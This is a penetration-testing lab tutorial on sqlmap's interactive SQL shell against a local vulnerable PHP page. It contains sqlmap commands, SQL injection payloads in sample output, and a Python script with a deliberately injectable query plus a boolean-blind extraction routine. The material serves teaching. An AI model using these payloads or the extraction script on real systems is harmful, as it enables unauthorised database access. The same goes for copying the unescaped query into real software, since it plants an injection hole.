Use the Interactive SQL Shell in sqlmap


Introduction

In this lab, you will explore one of the most powerful features of sqlmap: the interactive SQL shell. sqlmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers.

While sqlmap can automate data extraction (enumerating databases, tables and rows for you), the --sql-shell option gives you a direct, interactive prompt on the backend database, with every statement you type delivered through the injection point. This lets you run your own SQL and gives you greater flexibility and control during a penetration test. You will learn how to establish an injection, launch the shell, and execute queries to interrogate the database.

Establish a Successful Injection on a Target

In this step, you will use sqlmap to scan a web application and confirm that it is vulnerable to SQL injection. Our setup script has already created a simple, vulnerable PHP application running on the local Apache server. We need to point sqlmap to the target URL and let it perform the initial analysis.

First, run the following sqlmap command in your terminal. We use the -u flag to specify the target URL and --batch to run in non-interactive mode, accepting all default answers.

sqlmap -u "http://127.0.0.1/index.php?id=1" --batch

sqlmap will perform a series of tests. Wait for it to complete. The output will show that the GET parameter id is vulnerable. This confirmation is the necessary first step before we can proceed to exploitation.

You should see output similar to this, confirming the vulnerability:

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 1421=1421

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71627a7671,(SELECT (ELT(2521=2521,1))),0x71787a7171,0x78))s), 8446744073709551610, 8446744073709551610)))

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 2112 FROM (SELECT(SLEEP(5)))mrzs)
---
[15:30:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.52, PHP 8.1.2
back-end DBMS: MySQL >= 5.0
[15:30:00] [INFO] fetched data logged to text files under '/home/labex/.local/share/sqlmap/output/127.0.0.1'

Launch the Interactive SQL Shell with --sql-shell

In this step, you will use the --sql-shell option to gain an interactive SQL prompt on the target database. Now that you've confirmed the injection point, you can instruct sqlmap to provide you with direct access.

Run the same sqlmap command as before, but this time replace the --batch option with --sql-shell. Because sqlmap stores its findings in a session file under the output directory shown at the end of the previous run, it does not need to repeat the full set of injection tests.

sqlmap -u "http://127.0.0.1/index.php?id=1" --sql-shell

sqlmap will resume the injection point from its stored session (you will see a message that it "resumed the following injection point(s) from stored session" rather than the full test output) and then present you with a special prompt: sql-shell>. This indicates that you are now in an interactive session with the backend database. Any valid SQL query for the target DBMS (which we know is MySQL) can be entered at this prompt.

The output will look like this:

[15:35:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.52, PHP 8.1.2
back-end DBMS: MySQL >= 5.0
[15:35:00] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell>

Execute a Custom SQL Query like SELECT @@version

In this step, you will execute your first command in the interactive SQL shell. This will demonstrate your ability to directly query the database. A common first query is to check the database version.

At the sql-shell> prompt, type the following SQL query and press Enter. Remember to include the semicolon at the end.

SELECT @@version;

sqlmap does not open a database connection of its own: it wraps your query in the injection technique it identified, sends the resulting HTTP requests to the web application, and reassembles the query's output from the responses. With an error-based technique the result comes back in one or a few responses; with a boolean-based or time-based blind technique sqlmap has to recover it one character at a time over many requests, so larger results are noticeably slower. Because the output travels back through the page, the shell can only display the result of statements that return data. Statements such as INSERT, UPDATE or DELETE are executed only when the injection supports stacked queries, and sqlmap warns you when that is not the case. The @@version system variable in MySQL returns the database server version string.

You will see the database version printed directly to your console:

sql-shell> SELECT @@version;
[15:40:01] [INFO] fetching MySQL version
[15:40:01] [INFO] retrieved: 8.0.xx-0ubuntu0.22.04.x
8.0.xx-0ubuntu0.22.04.x

Execute Another Custom Query like SELECT user()

In this step, you will run another query to further explore the database. This reinforces the concept of interactive control. Let's find out which database user the web application is using to connect to the database.

At the sql-shell> prompt, type the SELECT user() query and press Enter.

SELECT user();

This command asks the database to return the user name and host of the current session. This is valuable for understanding the privilege level of your injection: a web application that connects as root@localhost gives you far more reach than one confined to a low-privilege account. Note that user() reports the credentials the client presented, while current_user() reports the account MySQL actually matched for authorization; when the two differ (for example because of wildcard host entries), current_user() is the one that determines your privileges, so SELECT current_user(); is a worthwhile follow-up query.

The output will show the database user, which we configured in the setup script:

sql-shell> SELECT user();
[15:42:10] [INFO] fetching current user
[15:42:10] [INFO] retrieved: labex@localhost
labex@localhost
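The two queries above come back through the web page rather than through a database connection, and on a target where only a boolean-based blind technique works, sqlmap has to rebuild every character of the answer from a yes/no difference in the response. The following script is an added example, not part of the lab or of sqlmap itself; it shows that mechanism in miniature. It assumes a constructed stand-in for the lab's vulnerable index.php (a hypothetical items table in an in-memory SQLite database, used in place of the lab's MySQL so the script runs offline) and reproduces the three things sqlmap does here: confirm the injection with a true and a false condition, as in Step 1; learn the length of a query's result; then binary-search each character code, which is what happens behind the sql-shell> prompt for SELECT @@version; or SELECT user();. The function names (vulnerable_page, BlindOracle, blind_select) are this example's own.

```python
import sqlite3

# Constructed stand-in for the lab's vulnerable index.php: the id parameter is
# concatenated into the WHERE clause unescaped. SQLite replaces the lab's MySQL
# so the example runs offline; the technique is the same. (Assumption: a table
# named items with a couple of rows. It is not the lab's schema.)
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?)", [(1, "apple"), (2, "pear")])
    return conn


def vulnerable_page(conn, id_param):
    """Simulates index.php?id=<id_param>: True if the page showed a row."""
    sql = "SELECT name FROM items WHERE id=" + id_param  # injectable on purpose
    try:
        return len(conn.execute(sql).fetchall()) > 0
    except sqlite3.Error:
        return False


class BlindOracle:
    """Turns the page's row/no-row difference into a yes/no oracle and
    rebuilds query output from it, as sqlmap does for boolean-based blind."""

    def __init__(self, conn):
        self.conn = conn
        self.requests = 0  # every ask() is one HTTP request in the real tool

    def ask(self, condition):
        self.requests += 1
        # Same shape as sqlmap's detection payload "id=1 AND 1421=1421"
        return vulnerable_page(self.conn, "1 AND (" + condition + ")")

    def confirm_injection(self):
        # Step 1 in miniature: a true condition keeps the row, a false one drops it.
        return self.ask("1=1") and not self.ask("1=2")

    def blind_int(self, expr, hi):
        """Binary-search the integer value of expr in [0, hi]."""
        lo = 0
        while lo < hi:
            mid = (lo + hi) // 2
            if self.ask("(" + expr + ")>" + str(mid)):
                lo = mid + 1
            else:
                hi = mid
        return lo

    def blind_select(self, query):
        """Recover the single-value result of `query` one character at a time.
        MySQL equivalents of the inner expressions: LENGTH() and ORD(MID(...))."""
        sub = "(" + query + ")"
        length = self.blind_int("LENGTH(" + sub + ")", 256)
        chars = []
        for pos in range(1, length + 1):
            code = self.blind_int("UNICODE(SUBSTR(%s,%d,1))" % (sub, pos), 255)
            chars.append(chr(code))
        return "".join(chars)


if __name__ == "__main__":
    oracle = BlindOracle(make_db())
    print("injectable:", oracle.confirm_injection())
    for q in ("SELECT sqlite_version()", "SELECT name FROM items WHERE id=2"):
        print("sql-shell> %s" % q, "->", oracle.blind_select(q))
    print("requests sent:", oracle.requests)
```

Run it and compare the request counter with the length of the recovered strings: roughly eight requests per character, plus eight for the length. That is why a blind-only target makes the shell feel slow, and why sqlmap prefers the error-based technique whenever the scan in Step 1 finds one.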

Exit the Interactive SQL Shell and Return to the Terminal

In this final step, you will learn how to properly exit the interactive SQL shell and return to your standard terminal prompt.

To exit the sql-shell> prompt, type x, q, exit or quit and press Enter (the shell's start-up message mentions x and q; exit and quit are accepted as well).

exit

sqlmap will close the session and return you to your normal shell prompt in the ~/project directory. This concludes the interactive session with the database.

The output will confirm that the session is ending:

sql-shell> exit
[15:45:00] [INFO] quitting
[15:45:00] [INFO] shutting down at 15:45:00

[*] shutting down...
labex@vnc-ubuntu:~/project$

You have now successfully used sqlmap's interactive shell to execute custom queries and have returned to your regular command line.

Summary

In this lab, you have successfully learned how to use one of sqlmap's most powerful features, the interactive SQL shell.

You began by identifying a SQL injection vulnerability in a target application using a basic sqlmap scan. Then, you leveraged this vulnerability by launching an interactive session with the --sql-shell flag. Inside this shell, you executed custom SQL queries like SELECT @@version; and SELECT user(); to directly interrogate the database and retrieve information. Finally, you learned how to exit the shell and return to your terminal. This skill is essential for any penetration tester who needs fine-grained control over a compromised database.